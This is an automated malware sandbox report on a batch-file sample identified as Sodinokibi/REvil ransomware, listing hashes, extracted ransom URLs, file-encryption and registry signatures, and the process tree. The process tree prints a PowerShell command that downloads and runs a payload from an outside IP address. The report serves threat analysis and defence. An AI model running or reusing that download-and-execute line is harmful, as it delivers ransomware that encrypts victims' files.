Analysis
-
max time kernel
77s -
max time network
45s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
29-08-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
9e35cd287a986dd3eab0fd5413dbbfb3.bat
Resource
win7
Behavioral task
behavioral2
Sample
9e35cd287a986dd3eab0fd5413dbbfb3.bat
Resource
win10v200722
General
-
Target
9e35cd287a986dd3eab0fd5413dbbfb3.bat
-
Size
215B
-
MD5
d14242bd9a927a641dc49bf913b5b570
-
SHA1
b031b26dd6d89c5672b9cb2f7fe66d650222a687
-
SHA256
755c35484b2236919e799e05687ca2aff151593f39c9deee51c33f6f33c97c7a
-
SHA512
ff13f23ffa4f9e0e568b9eb7aacfe9340d72e46dac773d51356b26b5323102c8d016f4c87ff6cb2d3d886961dd335382f37d88f27b6fac7264ae562079780ab0
Malware Config
Extracted
http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3
Extracted
C:\5u9099-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AF6D107408866E7D
http://decryptor.cc/AF6D107408866E7D
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 908 powershell.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\FindAssert.tif => \??\c:\users\admin\pictures\FindAssert.tif.5u9099 powershell.exe File opened for modification \??\c:\users\admin\pictures\ConvertToWrite.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ConvertToWrite.tiff => \??\c:\users\admin\pictures\ConvertToWrite.tiff.5u9099 powershell.exe File renamed C:\Users\Admin\Pictures\DisconnectResolve.crw => \??\c:\users\admin\pictures\DisconnectResolve.crw.5u9099 powershell.exe File renamed C:\Users\Admin\Pictures\PushReceive.crw => \??\c:\users\admin\pictures\PushReceive.crw.5u9099 powershell.exe File renamed C:\Users\Admin\Pictures\RestartSearch.tif => \??\c:\users\admin\pictures\RestartSearch.tif.5u9099 powershell.exe File opened for modification \??\c:\users\admin\pictures\NewConnect.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ConvertToUnblock.tif => \??\c:\users\admin\pictures\ConvertToUnblock.tif.5u9099 powershell.exe File renamed C:\Users\Admin\Pictures\NewConnect.tiff => \??\c:\users\admin\pictures\NewConnect.tiff.5u9099 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bl927t.bmp" powershell.exe -
Drops file in Program Files directory 37 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\OptimizeSync.DVR powershell.exe File opened for modification \??\c:\program files\StepStop.pps powershell.exe File opened for modification \??\c:\program files\UnblockNew.pptm powershell.exe File opened for modification \??\c:\program files\CompareUse.jpg powershell.exe File opened for modification \??\c:\program files\ImportDebug.zip powershell.exe File opened for modification \??\c:\program files\OptimizeDebug.tif powershell.exe File opened for modification \??\c:\program files\ClearGrant.xhtml powershell.exe File opened for modification \??\c:\program files\UnblockCheckpoint.php powershell.exe File opened for modification \??\c:\program files\OpenOptimize.asf powershell.exe File opened for modification \??\c:\program files\UninstallPublish.wpl powershell.exe File opened for modification \??\c:\program files\CheckpointGroup.dotx powershell.exe File opened for modification \??\c:\program files\ExportHide.mp3 powershell.exe File opened for modification \??\c:\program files\MergeInstall.vssm powershell.exe File opened for modification \??\c:\program files\ConnectEnable.emf powershell.exe File opened for modification \??\c:\program files\MoveGet.wpl powershell.exe File opened for modification \??\c:\program files\ExportWait.7z powershell.exe File opened for modification \??\c:\program files\PublishRepair.asx powershell.exe File opened for modification \??\c:\program files\ResumeFormat.cfg powershell.exe File opened for modification \??\c:\program files\UnpublishExit.js powershell.exe File opened for modification \??\c:\program files\UpdateDeny.ADT powershell.exe File created \??\c:\program files\5u9099-readme.txt powershell.exe File opened for modification \??\c:\program files\CompareGet.js powershell.exe File opened for modification \??\c:\program files\ExportInitialize.bmp powershell.exe File opened for modification \??\c:\program files\SuspendCopy.xla powershell.exe File opened for modification \??\c:\program files\WatchUse.avi powershell.exe File opened for modification \??\c:\program files\ApproveGroup.docx powershell.exe File opened for modification \??\c:\program files\DisconnectExpand.xps powershell.exe File opened for modification \??\c:\program files\ResizeUnblock.cr2 powershell.exe File opened for modification \??\c:\program files\SubmitCompare.xsl powershell.exe File opened for modification \??\c:\program files\UpdateLimit.pdf powershell.exe File opened for modification \??\c:\program files\ExpandUnprotect.gif powershell.exe File opened for modification \??\c:\program files\FindRemove.sql powershell.exe File opened for modification \??\c:\program files\SetAdd.mpg powershell.exe File opened for modification \??\c:\program files\MountEnable.vb powershell.exe File created \??\c:\program files (x86)\5u9099-readme.txt powershell.exe File opened for modification \??\c:\program files\ConnectDismount.potx powershell.exe File opened for modification \??\c:\program files\JoinWatch.dwg powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Modifies data under HKEY_USERS 5 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = be93d543487ed601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
svchost.exepowershell.exevssvc.exedescription pid process Token: SeShutdownPrivilege 2328 svchost.exe Token: SeCreatePagefilePrivilege 2328 svchost.exe Token: SeDebugPrivilege 908 powershell.exe Token: SeDebugPrivilege 908 powershell.exe Token: SeTakeOwnershipPrivilege 908 powershell.exe Token: SeBackupPrivilege 3068 vssvc.exe Token: SeRestorePrivilege 3068 vssvc.exe Token: SeAuditPrivilege 3068 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3816 wrote to memory of 908 3816 cmd.exe powershell.exe PID 3816 wrote to memory of 908 3816 cmd.exe powershell.exe PID 3816 wrote to memory of 908 3816 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9e35cd287a986dd3eab0fd5413dbbfb3.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3');Invoke-GBFBFRLC;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3068